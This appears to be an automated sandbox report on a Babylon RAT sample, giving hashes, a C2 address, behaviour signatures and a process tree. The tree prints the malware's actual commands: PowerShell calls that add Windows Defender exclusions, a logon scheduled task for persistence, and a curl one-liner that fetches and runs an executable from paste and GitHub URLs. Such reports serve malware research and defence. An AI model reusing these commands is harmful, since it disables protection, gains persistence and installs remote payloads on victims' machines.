Analysis

  • max time kernel
    149s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240508-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
  • submitted
    26-06-2024 14:24

General

  • Target

    2024-06-26_4c7afbccecb19ce4ed453f9c65fd36f1_poet-rat_snatch.exe

  • Size

    4.8MB

  • MD5

    4c7afbccecb19ce4ed453f9c65fd36f1

  • SHA1

    42bea032c04be5ad23ee33209d710365afbaba62

  • SHA256

    82d7f059608bbf6bf8112dfaa2cfae570b4fa68aa56f3b48cd3673212fa19c52

  • SHA512

    914dd71f49e12d2c3f1928903c4903af0b40d3b50f7e7be313b8923a91bf6b6f544be6b100f8a20c709275612d21a5f898e4b6bb60cc70903f1559606c956d46

  • SSDEEP

    49152:1ur1PwvIyeo+j+E5p9vTiOHWdC9hHbxCM5Ems3pQMLxA7y:qVo+jXJzWdC9lXEmBMN3

Malware Config

Extracted

Family

babylonrat

C2

147.185.221.20

Signatures

  • Babylon RAT

    Babylon RAT is remote access trojan written in C++.

  • Detects executables containing SQL queries to confidential data stores. Observed in infostealers 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Downloads MZ/PE file
  • Executes dropped EXE 2 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Modifies system certificate store 2 TTPs 3 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 6 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 29 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\2024-06-26_4c7afbccecb19ce4ed453f9c65fd36f1_poet-rat_snatch.exe
    "C:\Users\Admin\AppData\Local\Temp\2024-06-26_4c7afbccecb19ce4ed453f9c65fd36f1_poet-rat_snatch.exe"
    1⤵
    • Modifies system certificate store
    • Suspicious use of WriteProcessMemory
    PID:1896
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath \"$env:programdata\""
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:3260
    • C:\ProgramData\Microsoft\SvcHost\svc-host.exe
      C:\ProgramData\Microsoft\SvcHost\svc-host.exe
      2⤵
      • Executes dropped EXE
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:3100
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "%programdata%"
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:5060
      • C:\Windows\SysWOW64\schtasks.exe
        schtasks /Create /F /RL HIGHEST /SC ONLOGON /TN "Microsoft\Windows\SvcHost\SvcHost" /TR "cmd.exe /c start \"\" \"^%programdata^%\Microsoft\SvcHost\svc-host.exe\""
        3⤵
        • Scheduled Task/Job: Scheduled Task
        PID:2376
      • C:\Windows\SysWOW64\cmd.exe
        cmd.exe /c for /f "delims=" %i in ('curl -s https://rentry.co/o5kpirns/raw') do @curl -o "C:\ProgramData\Microsoft\Security\SecurityHealth.exe" %i 1>nul 2>&1
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2004
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c curl -s https://rentry.co/o5kpirns/raw
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:3000
          • C:\Windows\SysWOW64\curl.exe
            curl -s https://rentry.co/o5kpirns/raw
            5⤵
              PID:1864
          • C:\Windows\SysWOW64\curl.exe
            curl -o "C:\ProgramData\Microsoft\Security\SecurityHealth.exe" https://raw.githubusercontent.com/Drelta/test/main/SecurityDiagram.txt
            4⤵
              PID:3264
          • C:\Windows\SysWOW64\cmd.exe
            cmd.exe /c start "" "C:\ProgramData\Microsoft\Security\SecurityHealth.exe"
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:3600
            • C:\ProgramData\Microsoft\Security\SecurityHealth.exe
              "C:\ProgramData\Microsoft\Security\SecurityHealth.exe"
              4⤵
              • Executes dropped EXE
              • Suspicious behavior: GetForegroundWindowSpam
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of SetWindowsHookEx
              PID:1820
      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=4204,i,6166776566165096562,4582328833313060853,262144 --variations-seed-version --mojo-platform-channel-handle=3468 /prefetch:8
        1⤵
          PID:912

        Network

        MITRE ATT&CK Enterprise v15

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\ProgramData\Microsoft\Security\SecurityHealth.exe

          Filesize

          733KB

          MD5

          73a2ea546c656ceaa289f9221b6a1f59

          SHA1

          75ae715e21b6c2d3fb229f566a54518ac044d58b

          SHA256

          fa7ce16aab3ede14a4274600b3787bc66047001264da0cdeb965f231a1fd826f

          SHA512

          260ea61d495af5911080f268402c9be539cb8623418a71602db71e7e9933a80002c5ccaa4c29c78a60b22f0a2e773df46e0bd6f0d9f26e0e050542873e77e3a6

        • C:\ProgramData\Microsoft\SvcHost\svc-host.exe

          Filesize

          400KB

          MD5

          7d8e36e0658b87c7235d754e8ada2502

          SHA1

          4d16fd939eb3ec3ce3a2ad33e0c8154631de582b

          SHA256

          1c71376c691b2802a5809f3e0cf715e4de2611a6008bd40a3c81cecd6c77c365

          SHA512

          4330acd4b9365027c89237ff037529845628faee5b6693612e0f45fe77ae60c7cd68914a129d94d1718d4702a95bfec5d6741e79e896186bf104179d62fafab6

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

          Filesize

          64B

          MD5

          50a8221b93fbd2628ac460dd408a9fc1

          SHA1

          7e99fe16a9b14079b6f0316c37cc473e1f83a7e6

          SHA256

          46e488628e5348c9c4dfcdeed5a91747eae3b3aa49ae1b94d37173b6609efa0e

          SHA512

          27dda53e7edcc1a12c61234e850fe73bf3923f5c3c19826b67f2faf9e0a14ba6658001a9d6a56a7036409feb9238dd452406e88e318919127b4a06c64dba86f0

        • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_jb50n4f2.pks.ps1

          Filesize

          60B

          MD5

          d17fe0a3f47be24a6453e9ef58c94641

          SHA1

          6ab83620379fc69f80c0242105ddffd7d98d5d9d

          SHA256

          96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

          SHA512

          5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

        • memory/3260-1-0x000002BCD9D80000-0x000002BCD9DA2000-memory.dmp

          Filesize

          136KB

        • memory/3260-11-0x00007FFF91690000-0x00007FFF92151000-memory.dmp

          Filesize

          10.8MB

        • memory/3260-12-0x00007FFF91690000-0x00007FFF92151000-memory.dmp

          Filesize

          10.8MB

        • memory/3260-15-0x00007FFF91690000-0x00007FFF92151000-memory.dmp

          Filesize

          10.8MB

        • memory/3260-0-0x00007FFF91693000-0x00007FFF91695000-memory.dmp

          Filesize

          8KB

        • memory/5060-23-0x0000000002400000-0x0000000002436000-memory.dmp

          Filesize

          216KB

        • memory/5060-55-0x0000000006FC0000-0x0000000007063000-memory.dmp

          Filesize

          652KB

        • memory/5060-26-0x00000000743A0000-0x0000000074B50000-memory.dmp

          Filesize

          7.7MB

        • memory/5060-27-0x0000000004C60000-0x0000000004C82000-memory.dmp

          Filesize

          136KB

        • memory/5060-28-0x0000000005660000-0x00000000056C6000-memory.dmp

          Filesize

          408KB

        • memory/5060-29-0x00000000056D0000-0x0000000005736000-memory.dmp

          Filesize

          408KB

        • memory/5060-39-0x0000000005740000-0x0000000005A94000-memory.dmp

          Filesize

          3.3MB

        • memory/5060-24-0x0000000004F30000-0x0000000005558000-memory.dmp

          Filesize

          6.2MB

        • memory/5060-41-0x0000000005D30000-0x0000000005D4E000-memory.dmp

          Filesize

          120KB

        • memory/5060-42-0x0000000005D60000-0x0000000005DAC000-memory.dmp

          Filesize

          304KB

        • memory/5060-43-0x00000000062F0000-0x0000000006322000-memory.dmp

          Filesize

          200KB

        • memory/5060-44-0x00000000701C0000-0x000000007020C000-memory.dmp

          Filesize

          304KB

        • memory/5060-54-0x0000000006CF0000-0x0000000006D0E000-memory.dmp

          Filesize

          120KB

        • memory/5060-25-0x00000000743A0000-0x0000000074B50000-memory.dmp

          Filesize

          7.7MB

        • memory/5060-56-0x00000000076F0000-0x0000000007D6A000-memory.dmp

          Filesize

          6.5MB

        • memory/5060-57-0x0000000007070000-0x000000000708A000-memory.dmp

          Filesize

          104KB

        • memory/5060-58-0x00000000070E0000-0x00000000070EA000-memory.dmp

          Filesize

          40KB

        • memory/5060-59-0x00000000072D0000-0x0000000007366000-memory.dmp

          Filesize

          600KB

        • memory/5060-60-0x0000000007260000-0x0000000007271000-memory.dmp

          Filesize

          68KB

        • memory/5060-61-0x0000000007290000-0x000000000729E000-memory.dmp

          Filesize

          56KB

        • memory/5060-62-0x00000000072A0000-0x00000000072B4000-memory.dmp

          Filesize

          80KB

        • memory/5060-63-0x0000000007390000-0x00000000073AA000-memory.dmp

          Filesize

          104KB

        • memory/5060-64-0x0000000007380000-0x0000000007388000-memory.dmp

          Filesize

          32KB

        • memory/5060-67-0x00000000743A0000-0x0000000074B50000-memory.dmp

          Filesize

          7.7MB

        • memory/5060-22-0x00000000743AE000-0x00000000743AF000-memory.dmp

          Filesize

          4KB